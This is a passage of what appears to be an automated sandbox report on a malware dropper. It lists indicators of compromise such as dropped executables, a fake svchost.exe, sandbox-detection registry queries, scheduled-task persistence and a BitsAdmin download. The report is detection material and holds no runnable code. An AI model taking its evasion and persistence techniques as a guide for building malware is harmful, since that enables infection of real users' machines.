(x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libattachment_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\liblogo_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist_jstree.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\index.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png autosubplayer.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini 0yNgvBPcRWcsyU3553kqC43i.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll autosubplayer.exe -
Drops file in Windows directory 40 IoCs
Processes:
WerFault.exesvchost.exemsiexec.exeenkrj5IxvWlIKv5oouKejJ5B.exeTiWorker.exeMsiExec.exesvchost.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\Installer\MSI602E.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF38FE5ED882079A10.TMP msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\Installer\MSI5D79.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5F2F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6AD0.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\System\svchost.exe enkrj5IxvWlIKv5oouKejJ5B.exe File opened for modification C:\Windows\System\svchost.exe enkrj5IxvWlIKv5oouKejJ5B.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe File opened for modification C:\Windows\Installer\MSI6BAC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7AB2.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\Installer\MSI5F5F.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI6E9B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7F48.tmp msiexec.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\Installer\f7758f4.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI658F.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Installer\MSI7DC1.tmp msiexec.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\Installer\MSI6EEA.tmp msiexec.exe File created C:\Windows\System\xxx1.bak enkrj5IxvWlIKv5oouKejJ5B.exe File opened for modification C:\Windows\Installer\MSI600E.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File created C:\Windows\SystemTemp\~DFE9E70550BA6E49A0.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF4295E7C09D24318B.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFC7FF7AA0E4F49C25.TMP msiexec.exe File created C:\Windows\System\xxx1.bak svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File created C:\Windows\Installer\f7758f4.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI5F8F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5FCE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6417.tmp msiexec.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4884 1772 WerFault.exe qzCQ9wqiLMPlyVDD8ZFRIOqV.exe 4004 2924 WerFault.exe yvhLYbbmmCfOlUgWABtSMRDf.exe 2556 1816 WerFault.exe EruXS7l1FPOtK_uzRDbujkGd.exe 3940 2060 WerFault.exe QO8u8gtb7uObQDhzvhRv4igC.exe 2544 5100 WerFault.exe FJEIGTwa1q3oVzOT5c3cc37b.exe 2268 836 WerFault.exe QyJbYA0cr9LsSfWa6gVbLrL2.exe 2888 4056 WerFault.exe 04L8wfx8yzTV7egq7doWxMGm.exe 2848 2668 WerFault.exe 7LqbaIUgDyMj8g6M1AWB5VC1.exe 5844 784 WerFault.exe wb9Z4W6sHdzd2qgFhpqZc9DO.exe 5032 2796 WerFault.exe V3hMvyVpqo4RRJQ0L41za8qq.exe 1468 2084 WerFault.exe KxSo365gOHwonWD80HicVHZz.exe 2176 5032 WerFault.exe D97A.exe 860 5048 WerFault.exe 1657.exe 5024 3984 WerFault.exe 40C3.exe 2036 5792 WerFault.exe 7BAA.exe 132 2448 WerFault.exe 8EA7.exe 3216 6336 WerFault.exe autosubplayer.exe -
NSIS installer 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\BbcTQM9kCz2wSCp4zL3cjKtX.exe nsis_installer_1 C:\Users\Admin\Pictures\Adobe Films\BbcTQM9kCz2wSCp4zL3cjKtX.exe nsis_installer_2 C:\Users\Admin\Pictures\Adobe Films\BbcTQM9kCz2wSCp4zL3cjKtX.exe nsis_installer_1 C:\Users\Admin\Pictures\Adobe Films\BbcTQM9kCz2wSCp4zL3cjKtX.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
3gsTxWt53bh_Ip3JWz9BDOLx.exeAA4A.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3gsTxWt53bh_Ip3JWz9BDOLx.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3gsTxWt53bh_Ip3JWz9BDOLx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AA4A.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AA4A.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AA4A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3gsTxWt53bh_Ip3JWz9BDOLx.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeD97A.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeschtasks.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exesvchost.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 D97A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz schtasks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier schtasks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString D97A.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision D97A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier schtasks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString schtasks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 428 schtasks.exe 3940 schtasks.exe 4316 schtasks.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 37 IoCs
Processes:
msedge.exemsedge.exeWerFault.exeWerFault.exeschtasks.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeD97A.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS schtasks.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU schtasks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU D97A.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS D97A.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 6476 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
WaaSMedicAgent.exeWaaSMedicAgent.exeWaaSMedicAgent.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople 